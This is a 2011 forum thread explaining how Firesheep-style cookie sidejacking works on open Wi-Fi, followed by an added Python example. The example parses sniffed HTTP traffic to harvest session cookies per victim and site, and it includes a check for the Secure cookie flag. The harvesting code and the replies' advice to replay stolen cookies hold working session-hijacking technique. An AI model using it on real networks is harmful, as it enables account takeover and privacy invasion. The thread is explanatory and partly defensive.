billyblaxsta Posted August 16, 2011 Hi, I have a couple of questions about Firesheep. AIUI, it works when - although the logon is HTTPS - the cookie sent by the server immediately after the logon is finished is sent through HTTP. Therefore, Firesheep is defeated by constant HTTPS (as can happen in Gmail and Facebook, for example). What I do not understand, having read (http://codebutler.com/firesheep), is whether the Firesheep user is operating as a MITM in order to obtain the session cookie. In the episode (http://hak5.org/episodes/episode-906) it looks as if Shannon is using Cain to ARP spoof Darren before using Firesheep. However, there is no mention of ARP spoofing on the coder's site, and instead he says "On an open wireless network, cookies are basically shouted through the air, making these attacks extremely easy." Is this really the situation? Why would a cookie be sent to anyone on the wireless network rather than to the actual client who has just logged in? And, therefore, how exactly does Firesheep obtain the session cookie? Thanks.
digip Posted August 16, 2011 (edited) Better to use hamster and ferret, as it doesn't require a site profile to grab the cookies. Hamster and ferret will work on any site. Basically it's a packet capture tool, kind of like wireshark and tcpdump, but specializes in pulling the cookies out of the packets and associating them with the site they came from. You can then dump them to your browser and log in as the end user. You could also do this manually with wireshark and a card in monitor mode on an unencrypted network, but it's a pain in the ass to have to enter them all by hand when tools do it for you. Edited August 16, 2011 by digip
Terror Factor Posted August 16, 2011 On wired networks or WPA Enterprise networks you need to do a MITM first. WiFi networks work like a hub: everyone receives the traffic (you can't direct those radio waves to every client individually), so on open networks you can get those cookies (and all other traffic, of course!), on WEP networks you can do the same if you know/crack the password, and on WPA networks you can do the same if you know/crack the password AND capture the handshake of the user(s) who you are trying to sniff. The cookie itself is just sent in plain text (you can verify this with wireshark), so if you can see the traffic, you can see the cookie.
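To make the mechanism in the replies above concrete, here is an added example (not code from the thread, nor from Firesheep, hamster or ferret): a minimal cookie sidejacking parser. It takes the raw TCP payloads a sniffer would hand back from an open wireless network, pulls the Cookie header out of every plaintext HTTP request, and groups the cookies by client and Host, which is what Firesheep's site profiles and hamster/ferret automate. The captured payloads, client addresses and hostnames below are constructed for this example; in a real run the payloads would come from a monitor-mode capture and the client address from the IP header. It also includes a check for the Secure attribute on Set-Cookie, the server-side setting that stops a browser from ever sending the session cookie over HTTP, which is what the "constant HTTPS" defence in the first post relies on.

```python
"""Added example: harvest session cookies from sniffed plaintext HTTP
requests (the Firesheep / hamster+ferret technique) and check whether
a Set-Cookie header would have prevented it. Sample data is constructed."""

from collections import defaultdict

# Constructed sample of what a monitor-mode capture on an open network
# might yield: (client_ip, raw TCP payload). Two clients, two sites,
# plus one TLS record that a cookie sniffer cannot read.
CAPTURED_PAYLOADS = [
    ("192.168.1.23",
     b"GET /home.php HTTP/1.1\r\nHost: www.example-social.com\r\n"
     b"User-Agent: Mozilla/5.0\r\nCookie: c_user=10023; xs=4f1a9c2d; datr=abc\r\n\r\n"),
    ("192.168.1.23",
     b"GET /static/logo.png HTTP/1.1\r\nHost: cdn.example-social.com\r\n\r\n"),
    ("192.168.1.57",
     b"POST /mail/ HTTP/1.1\r\nHost: mail.example-webmail.net\r\n"
     b"Content-Length: 0\r\nCookie: SID=AbCdEf123; HSID=zz\r\n\r\n"),
    # TLS ClientHello (constructed bytes): opaque to the sniffer, nothing to harvest
    ("192.168.1.57", b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03\xde\xad\xbe\xef"),
]


def parse_http_request(payload: bytes):
    """Return (host, {cookie_name: value}) if the payload is a plaintext HTTP
    request with a Host header, otherwise None. Parsing is deliberately
    minimal: request line, then 'Name: value' headers up to the blank line."""
    try:
        text = payload.decode("ascii")
    except UnicodeDecodeError:
        return None  # binary (e.g. TLS) traffic, not HTTP
    head, sep, _body = text.partition("\r\n\r\n")
    if not sep:
        return None  # no complete header block
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    host = None
    cookies = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        if name == "host":
            host = value
        elif name == "cookie":
            # Cookie: a=1; b=2  -> browser sends every cookie in scope, in the clear
            for pair in value.split(";"):
                key, _, val = pair.strip().partition("=")
                if key:
                    cookies[key] = val
    if host is None:
        return None
    return host, cookies


def harvest_sessions(payloads):
    """Group harvested cookies by (client_ip, host), merging cookies seen
    across several requests from the same client to the same site.
    Requests carrying no Cookie header are skipped."""
    sessions = defaultdict(dict)
    for client_ip, payload in payloads:
        parsed = parse_http_request(payload)
        if parsed is None:
            continue
        host, cookies = parsed
        if cookies:
            sessions[(client_ip, host)].update(cookies)
    return dict(sessions)


def secure_flag_missing(set_cookie_value: str) -> bool:
    """True when a Set-Cookie header value lacks the Secure attribute, i.e.
    the browser will also send this cookie over plaintext HTTP, where a
    sniffer on an open network can read it."""
    attrs = [a.strip().lower() for a in set_cookie_value.split(";")[1:]]
    return "secure" not in attrs


if __name__ == "__main__":
    for (ip, host), cookies in harvest_sessions(CAPTURED_PAYLOADS).items():
        print(f"{ip} -> {host}: {cookies}")
    print("Secure missing:", secure_flag_missing("xs=4f1a9c2d; Path=/; HttpOnly"))
```

Running the block prints one harvested session per client and site; the CDN request contributes nothing because it carried no Cookie header, and the TLS record is rejected before header parsing. Whether a harvested cookie is actually enough to impersonate the user is the part a site profile encodes, and the point of the Secure check is that a cookie marked Secure never appears in the plaintext half of the traffic at all.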